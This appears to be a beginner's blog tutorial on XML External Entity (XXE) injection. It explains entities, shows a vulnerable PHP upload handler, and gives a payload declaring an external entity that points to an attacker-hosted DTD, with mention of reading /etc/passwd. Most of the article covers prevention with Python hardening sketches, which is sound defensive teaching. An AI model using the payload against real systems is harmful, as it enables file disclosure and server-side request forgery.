XML external entity (XXE) 101

anuragTaparia

XML External Entity Injection (XXE) is a security flaw that lets attackers abuse the way a web application parses XML in order to read sensitive data from the server, make the server send requests to other systems, or, in some configurations, run malicious code. It arises when an application parses untrusted XML with a parser that is configured to resolve external entities, so that entity declarations supplied by the attacker are processed along with the rest of the document.
In this article, we’ll describe in simple terms how an XXE attack can be carried out and how to prevent it.

What is XML?

XML stands for Extensible Markup Language. It is a standard format for exchanging data between different systems, regardless of the platform or programming language used. XML uses tags to define data elements and the structure of the document.
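As a small illustration of tags and structure, the sketch below parses a made-up "note" document with Python's standard library. The document content and the read_note helper are assumptions chosen for this example; Python is used here only for illustration and is not the language of the application discussed later.

```python
import xml.etree.ElementTree as ET

# A hypothetical document: each tag names a data element, and nesting
# expresses the structure (a note that contains three fields).
NOTE_XML = """<note>
  <to>Alice</to>
  <from>Bob</from>
  <body>Lunch at noon?</body>
</note>"""


def read_note(xml_text):
    """Map each child tag of the root element to its text content."""
    root = ET.fromstring(xml_text)
    return {child.tag: child.text for child in root}


print(read_note(NOTE_XML))
```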

What are External Entities?

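An entity is a named placeholder declared in a document's DTD (Document Type Definition) and referenced in the content as &name;. An internal entity carries its replacement text in the declaration itself, while an external entity uses the SYSTEM keyword to point at an external source, such as a file or a URL, which the parser loads when the entity is referenced. External entities can be useful for reusing common content across multiple documents. However, if an attacker can declare their own external entity, they decide which file or URL the parser will try to load.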
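To make the difference between internal and external declarations concrete, here is a minimal sketch that lists the entities a document declares without resolving any of them. It uses the EntityDeclHandler callback of Python's xml.parsers.expat module; the sample document, the entity names, and the list_entities helper are assumptions made up for this example.

```python
from xml.parsers import expat

# Hypothetical document declaring one internal and one external entity.
DOC = """<!DOCTYPE note [
  <!ENTITY company "Example Corp">
  <!ENTITY footer SYSTEM "http://example.com/footer.xml">
]>
<note>Sent by &company;</note>"""


def list_entities(xml_text):
    """Return (name, kind, target) for every entity declared in the DTD.

    Nothing is fetched: the declarations are only reported by the parser.
    """
    found = []

    def on_entity_decl(name, is_parameter, value, base,
                       system_id, public_id, notation):
        if system_id is not None:
            # A system identifier means the content lives outside the document.
            found.append((name, "external", system_id))
        else:
            found.append((name, "internal", value))

    parser = expat.ParserCreate()
    parser.EntityDeclHandler = on_entity_decl
    parser.Parse(xml_text, True)
    return found


for entry in list_entities(DOC):
    print(entry)
```

A listing like this can be handy when auditing which XML inputs rely on external entities at all.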

What is XXE?

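XXE is a type of attack that exploits the use of external entities in XML. An attacker crafts an XML document that declares an external entity pointing at a resource of their choosing and then references that entity in the document. When a vulnerable parser processes the document, it loads the resource and substitutes its content for the reference. This can let the attacker read files on the server, make the server send requests to internal systems (server-side request forgery), or cause a denial of service; code execution is possible only in certain configurations.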

Source: PortSwigger

Example of XXE Attack:

Suppose there is a web application that allows users to upload an XML file and then displays the content of the file on the screen. The web application might use the following code to process the uploaded XML file:

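// Parse the uploaded file. Whether entities are resolved depends on the
// libxml2 version and on options such as LIBXML_NOENT.
$xml = simplexml_load_file($_FILES['file']['tmp_name']);
// Print selected elements back to the user.
echo $xml->to;
echo $xml->from;
echo $xml->body;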

This code reads the XML file uploaded by the user, extracts the ‘to’, ‘from’, and ‘body’ elements, and displays them on the screen. However, if the parser is set up to resolve external entities (for example, an old libxml2 version, or parsing with the LIBXML_NOENT option), an entity reference inside one of those elements is replaced with whatever the entity points to, and that content is then displayed to the attacker.

For example, an attacker could craft an XML file with the following content:

<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE foo [
  <!ELEMENT foo ANY >
  <!ENTITY xxe SYSTEM "http://example.com/evil.dtd">
]>
<foo>&xxe;</foo>

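In this example, the XML file declares an external entity called ‘xxe’ and references it inside the ‘foo’ element. The entity's system identifier is a URL on an attacker-controlled server, so a parser that resolves it sends an HTTP request from the application server and substitutes the response into the document. Nothing is "executed" by this step; the damage comes from what the parser can be made to fetch.
Pointing the same entity at a local path, such as file:///etc/passwd, makes the parser read that file instead, and a DTD hosted on the attacker's server can define further entities that send the file's content back to the attacker. In this way sensitive data, such as passwords or configuration files, can leave the server.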
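How a parser reacts to this payload depends on the library and its configuration. As a hedged illustration in Python (not the PHP stack used above), the sketch below feeds the same document to the standard library's xml.etree.ElementTree, which does not resolve external entities and reports the reference as an error instead of fetching the URL. The try_parse helper is an assumption made up for this example.

```python
import xml.etree.ElementTree as ET

# The example payload from the article, as bytes so that the encoding
# declaration is honoured by the parser.
PAYLOAD = b"""<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE foo [
  <!ELEMENT foo ANY >
  <!ENTITY xxe SYSTEM "http://example.com/evil.dtd">
]>
<foo>&xxe;</foo>"""


def try_parse(xml_bytes):
    """Parse the document and describe what the parser did with it."""
    try:
        root = ET.fromstring(xml_bytes)
    except ET.ParseError as exc:
        # ElementTree does not load external entities, so the reference
        # cannot be expanded and parsing fails.
        return f"rejected: {exc}"
    return f"parsed: {root.text!r}"


print(try_parse(PAYLOAD))
```

Running the same test against the parser an application actually uses is a quick way to find out whether it is exposed.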

Preventing XXE Attacks

To prevent XXE attacks, web applications must configure their XML parsers so that untrusted input cannot trigger external entity resolution, and should validate the XML they receive.

Disabling External Entities:
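The most reliable way to prevent XXE attacks is to disable external entities, and ideally DTD processing altogether, in the XML parser's configuration. This cannot be done from inside the XML document: the attacker controls the document, so a DOCTYPE placed at the beginning of it is itself attacker-supplied input and cannot be relied on to restrict anything.

In PHP, libxml2 2.9.0 and later do not substitute external entities unless the application asks for it, so the main rule is to avoid passing the LIBXML_NOENT and LIBXML_DTDLOAD options when parsing untrusted XML. On older libxml2 versions, libxml_disable_entity_loader(true) turns external entity loading off; the function is deprecated as of PHP 8.0 because it is no longer needed there. Other XML libraries expose equivalent settings, and they should be checked explicitly rather than assumed.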
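Hardening belongs in the code that parses the document rather than in the document itself. One strict variant is to refuse any input that carries a DOCTYPE at all, since entities can only be declared there. The following is a minimal Python sketch of that idea using the standard library's expat bindings; the DoctypeForbidden exception and the safe_fromstring helper are names invented for this example, and the approach assumes the application never needs DTDs in its input.

```python
import xml.etree.ElementTree as ET
from xml.parsers import expat


class DoctypeForbidden(ValueError):
    """Raised when untrusted XML contains a DOCTYPE declaration."""


def _reject_doctype(name, system_id, public_id, has_internal_subset):
    # Called by expat as soon as it sees "<!DOCTYPE ...": stop right there.
    raise DoctypeForbidden(f"DOCTYPE {name!r} is not allowed")


def safe_fromstring(xml_bytes):
    """Parse XML only if it declares no DOCTYPE (and therefore no entities)."""
    checker = expat.ParserCreate()
    checker.StartDoctypeDeclHandler = _reject_doctype
    checker.Parse(xml_bytes, True)  # raises DoctypeForbidden on a DOCTYPE
    return ET.fromstring(xml_bytes)


PAYLOAD = b"""<!DOCTYPE foo [
  <!ENTITY xxe SYSTEM "http://example.com/evil.dtd">
]>
<foo>&xxe;</foo>"""

try:
    safe_fromstring(PAYLOAD)
except DoctypeForbidden as exc:
    print("refused:", exc)
```

The document is parsed twice in this sketch, which keeps the code short at the cost of some speed; for large inputs a single-pass variant would be preferable.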

Input Validation:
Input validation is an important additional step in preventing XXE attacks. Web applications should validate XML input to ensure that it contains only the data they expect.
One way to validate the XML input is to use an XML parser that supports the XSD (XML Schema Definition) format. XSD is a standard way to define the structure and data types of an XML document. By using XSD, web applications can ensure that the XML input conforms to a specific schema and does not contain any unexpected elements or attributes. Validation complements, but does not replace, disabling external entities: entity references are resolved by the parser before the validator sees the content, so a parser that still resolves them remains exposed.
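Python's standard library has no XSD validator, so the sketch below is a deliberately simple stand-in rather than real schema validation: it checks a parsed document against a hard-coded expected structure. The "note" structure, the constants, and the validate_note helper are assumptions for this example; a real application would more likely use an XSD-capable library.

```python
import xml.etree.ElementTree as ET

# Hypothetical expected structure: <note> with exactly these children, in order.
EXPECTED_ROOT = "note"
EXPECTED_CHILDREN = ["to", "from", "body"]


def validate_note(xml_text):
    """Return a list of problems; an empty list means the structure matches."""
    try:
        root = ET.fromstring(xml_text)
    except ET.ParseError as exc:
        return [f"could not be parsed: {exc}"]

    problems = []
    if root.tag != EXPECTED_ROOT:
        problems.append(f"unexpected root element {root.tag!r}")
    if root.attrib:
        problems.append("root element must not have attributes")
    tags = [child.tag for child in root]
    if tags != EXPECTED_CHILDREN:
        problems.append(f"expected children {EXPECTED_CHILDREN}, got {tags}")
    for child in root:
        # Each field must be plain text: no attributes, no nested elements.
        if child.attrib or len(child) > 0:
            problems.append(f"element {child.tag!r} must contain text only")
    return problems


print(validate_note("<note><to>A</to><from>B</from><body>C</body></note>"))
```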

Whitelisting:
Another way to reduce the risk, for applications that genuinely need external entities, is a whitelist approach. The parser is given a custom entity resolver that only loads entities whose identifiers appear on a fixed list of trusted sources. Every other reference is rejected, so attackers cannot make the parser fetch a file or URL of their choosing.
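A whitelist of this kind can be sketched in Python with expat's ExternalEntityRefHandler, which is called whenever the document references an external entity. In this example the trusted content is kept in an in-memory dictionary rather than fetched from disk or the network; the ALLOWED_ENTITIES table, the identifiers in it, and the expand_with_allowlist helper are all assumptions invented for illustration.

```python
from xml.parsers import expat

# Hypothetical whitelist: system identifier -> trusted replacement content.
ALLOWED_ENTITIES = {"footer.xml": "Shared footer text"}


def expand_with_allowlist(xml_text, allowed=ALLOWED_ENTITIES):
    """Return the document's text, expanding only whitelisted external entities."""
    chunks = []
    parser = expat.ParserCreate()

    def on_external_entity(context, base, system_id, public_id):
        if system_id not in allowed:
            raise PermissionError(f"external entity {system_id!r} is not allowed")
        # Parse the trusted replacement with a child parser, which inherits
        # the handlers of the parent (including the text collector below).
        child = parser.ExternalEntityParserCreate(context)
        child.Parse(allowed[system_id].encode("utf-8"), True)
        return 1  # tell expat the entity was handled

    parser.CharacterDataHandler = chunks.append
    parser.ExternalEntityRefHandler = on_external_entity
    parser.Parse(xml_text, True)
    return "".join(chunks)


GOOD = '<!DOCTYPE note [<!ENTITY footer SYSTEM "footer.xml">]><note>Body. &footer;</note>'
BAD = '<!DOCTYPE note [<!ENTITY xxe SYSTEM "file:///etc/passwd">]><note>&xxe;</note>'

print(expand_with_allowlist(GOOD))
try:
    expand_with_allowlist(BAD)
except PermissionError as exc:
    print("refused:", exc)
```

Matching on exact identifiers, as done here, is stricter than matching on prefixes or hostnames and leaves less room for bypasses.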

Conclusion

In conclusion, XXE attacks can be a serious threat to web applications that accept XML input. Attackers can exploit this vulnerability to read sensitive data, reach internal systems through the server, or, in some configurations, execute malicious code. The most reliable defense is to disable external entities in the XML parser; input validation and whitelisting of trusted entity sources add further protection when combined with it.

References

OWASP: XML External Entity (XXE) Processing - https://owasp.org/www-community/vulnerabilities/XML_External_Entity_(XXE)_Processing
SANS Institute: XML External Entity (XXE) Processing - https://www.sans.org/reading-room/whitepapers/application/xml-external-entity-xxe-processing-35157
PortSwigger: XML External Entity (XXE) Injection - https://portswigger.net/web-security/xxe-injection
IBM: Preventing XML External Entity (XXE) Injection - https://www.ibm.com/docs/en/security-appscan/9.0.3.3?topic=ov-preventing-xml-external-entity-injection-xxe
Rapid7: XML External Entity Injection - https://www.rapid7.com/resources/xml-external-entity-injection/